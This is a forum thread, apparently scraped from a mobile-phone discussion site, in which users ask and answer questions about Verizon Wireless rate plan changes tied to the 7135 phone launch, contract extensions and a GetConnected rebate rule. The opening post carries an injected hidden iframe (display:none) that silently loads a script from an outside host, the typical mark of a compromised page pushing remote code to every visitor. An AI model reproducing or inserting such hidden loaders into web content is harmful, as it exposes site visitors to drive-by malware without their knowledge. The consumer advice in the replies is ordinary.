+ Reply to Thread

VZW New Rate Plans w/ 7135 Launch?

I have seen some speculation about a plan change (for EN atleast) when VZW finially releases the phone. So here's my two-fold question:
    1) Does anyone know any specifics of the plan changes, aka price & launch date? I have seen only one rumor about the unlimited plan.
    2) What is VZW's policy on changing plans. ie: if I go into a store today and con them into ordering the phone, and I sign a contract, will they let me change the plan after a month?

Basicially would I be better waiting for the new plan launch to get the phone?
    Thanks!
    ~Erich<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: VZW New Rate Plans w/ 7135 Launch?

Originally posted by serich
    I have seen some speculation about a plan change (for EN atleast) when VZW finially releases the phone. So here's my two-fold question:
    1) Does anyone know any specifics of the plan changes, aka price & launch date? I have seen only one rumor about the unlimited plan.
    2) What is VZW's policy on changing plans. ie: if I go into a store today and con them into ordering the phone, and I sign a contract, will they let me change the plan after a month?

Basicially would I be better waiting for the new plan launch to get the phone?
    Thanks!
    ~Erich
    I don't have any info on the rumours, but as far as changin plans, you can do it at any time. Depending on the change, you may need to extend your contract from teh date of the change. For instance, I changed ffrom national Single Rate to America's choice, and had to extend my contract out for two years in order to take advantage of the NW promotions. I also added unlimited express network, and they told me I could drop it or change it to any of the other EN add-on plans without penalty.

Alan

GetConnected Rebate

For those of you who bought the Verizon phone from GetConnected, the rebate form says that "Service must be maintained on the purchased plan for a minimum of 180 days."

Has anyone inquired about this? Will they give you a problem if the plan is upgraded to a more expensive one?

Thanks,
    Mike

It's my understanding also that you can opt to change plans at any time, although you may have to extend the contract (It might be a good idea to ask Verizon that question also ). In my experience with wireless carriers there are the things they tell you they can and can't do... and then there are the things they really can and can't do. I'm new to Verizon after 6+ years with Sprint, so when I established service with, them it was important to me to deal with a rep in a store that I felt would work with me in the future. It can't hurt anyway
    Please visit my picture site: Robert-O-Rama :)

Re: GetConnected Rebate

Originally posted by mikelawr
    For those of you who bought the Verizon phone from GetConnected, the rebate form says that "Service must be maintained on the purchased plan for a minimum of 180 days."

Has anyone inquired about this? Will they give you a problem if the plan is upgraded to a more expensive one?

Thanks,
    Mike
    I've only had the time to inquire with Verizon and not GC. Verizon said it wasn't going to cause any problems. I imagine that the definition of service plan is the original account. (of course I was only adding a phone)

Also, when I added the 2nd phone to the contract, it extended my contract 1 year from that new date.

The first thing I did after getting the phone from GetConnected was change to the ExpressNetwork plan; I called thereafter with minor changes, some of which were lower-cost, and all changes were handled promptly and easily, but they did reset my 2-yr agreement clock back to T=0.
    Ahhhh, gadgets! :bigthumb: